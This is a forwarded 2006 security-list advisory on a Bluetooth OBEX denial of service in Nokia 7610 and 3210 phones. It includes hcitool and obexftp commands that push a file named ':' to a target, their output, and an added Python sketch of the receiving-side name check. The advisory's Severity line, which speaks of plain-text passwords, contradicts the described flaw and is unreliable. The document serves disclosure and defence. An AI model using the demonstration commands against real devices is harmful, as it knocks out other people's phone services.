---------- Forwarded message ----------
From: Franckl MobiBug
To: mobibug
Date: Wed, 8 Feb 2006 16:10:40 +0100
Reply-To: Security Mailing List
Subject: [Mobibug] Nokia 3210 And 7610 Remote OBEX Denial Of Service Vulnerability

*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#*

Title: Nokia 3210 And 7610 Remote OBEX Denial Of Service Vulnerability
Release Date: 09/26/2005
Vulnerability Type: Failure to handle exceptional conditions
Severity: Low, a local attacker can view server passwords in plain text.
Affected terminals: Nokia 7610 / Nokia 3210
Auth: http://www.nokia.com

Disclaimer:
==========
The information is provided "as is" without warranty of any kind. The author of this issue shall not be held liable for any damages due to the information contained in this advisory.

Vulnerability Description:
=========================
A remote denial of service vulnerability affects Nokia 3210 and 7610 phones. This issue is due to a failure of the operating system to handle certain filename characters in Bluetooth OBEX transfers.

An attacker may leverage this issue to cause affected Nokia devices to fail to respond to further Bluetooth OBEX communications. Further communication likely fails until the affected phone is restarted. Due to code reuse among devices, other phones may also be affected.

There is a flaw in the OBEX implementation of the Nokia 7610 (V4.0.437 15-09-04 RH51), and others, that disables this service if you send a file named ":" or "\".

---- Quote of IROBEX12.pdf, page 40, section 4.3 (OBEX specification) ----
"Pushing objects into the inbox
Objects are pushed into the inbox by using the PUT command with a Name header. The string in the Name header should not contain any path characters such as ':', '/' or '\'. Objects with improperly formed names should be rejected."
----

The device asks for a PIN if you are not paired, or asks whether you want to accept a connection from the remote box; you need to ACCEPT.
It has low risk, because it does not work if you do not accept the incoming connection. If the connection is established, the file is sent and there is no "New message arrived" message, as there is when you send a correct file. That is fine: the filename is dropped. The problem is that the OBEX service does not work any more after this: if you try to send another file, or a vCard from another device, you cannot connect to the remote OBEX service again.

Demonstration with Linux as client:

jim:# hcitool scan
Scanning ...
        00:13:70:5E:1F:01       7610
jim:# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing another file after sending the ":" filename:

jim:# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect

------------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.

Credits:
========
Alejandro Ramos
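
Added example (not part of the original advisory, and not Nokia's or obexftp's code): the receiving side of the check quoted from section 4.3, parsing the Name header of an OBEX PUT packet and rejecting ':', '/' and '\' while the handler stays able to serve the next request. The function names, the choice of Bad Request as the rejection code, the first-packet-only handling and the sample packets are assumptions of this example.

```python
import struct

# Opcode, header IDs and response codes as defined by the OBEX specification.
# Answering a bad name with Bad Request is this example's choice (assumption).
PUT, HI_NAME, HI_END_OF_BODY = 0x02, 0x01, 0x49
RSP_CONTINUE, RSP_SUCCESS, RSP_BAD_REQUEST = 0x90, 0xA0, 0xC0
PATH_CHARS = set(':/\\')  # characters section 4.3 says a Name must not contain

def parse_name(packet: bytes):
    """Return the Name header text of one OBEX request packet, or None if absent."""
    if len(packet) < 3 or struct.unpack(">H", packet[1:3])[0] != len(packet):
        raise ValueError("bad packet length")
    pos = 3
    while pos < len(packet):
        hi = packet[pos]
        if hi & 0x80:                    # fixed-size header: 1-byte or 4-byte value
            hlen = 5 if hi & 0x40 else 2
        else:                            # length-prefixed: Unicode text or byte sequence
            if pos + 3 > len(packet):
                raise ValueError("truncated header")
            hlen = struct.unpack(">H", packet[pos + 1:pos + 3])[0]
            if hlen < 3:
                raise ValueError("bad header length")
        if pos + hlen > len(packet):
            raise ValueError("header overruns packet")
        if hi == HI_NAME:                # null-terminated UTF-16BE text
            return packet[pos + 3:pos + hlen].decode("utf-16-be").rstrip("\x00")
        pos += hlen
    return None

def handle_put(packet: bytes) -> int:
    """Response code for the first packet of an inbox push. Never raises, so a
    malformed or forbidden name costs one rejected request, not the service."""
    try:
        if packet[0] & 0x7F != PUT:
            return RSP_BAD_REQUEST
        name = parse_name(packet)
    except (ValueError, IndexError):     # UnicodeDecodeError is a ValueError
        return RSP_BAD_REQUEST
    if not name or PATH_CHARS & set(name):
        return RSP_BAD_REQUEST
    return RSP_SUCCESS if packet[0] & 0x80 else RSP_CONTINUE

def build_put(name: str, body: bytes = b"hello\n") -> bytes:
    """Constructed sample: a single-packet PUT (Final bit set) with Name and End-of-Body."""
    n = (name + "\x00").encode("utf-16-be")
    hdrs = bytes([HI_NAME]) + struct.pack(">H", len(n) + 3) + n
    hdrs += bytes([HI_END_OF_BODY]) + struct.pack(">H", len(body) + 3) + body
    return bytes([PUT | 0x80]) + struct.pack(">H", len(hdrs) + 3) + hdrs
```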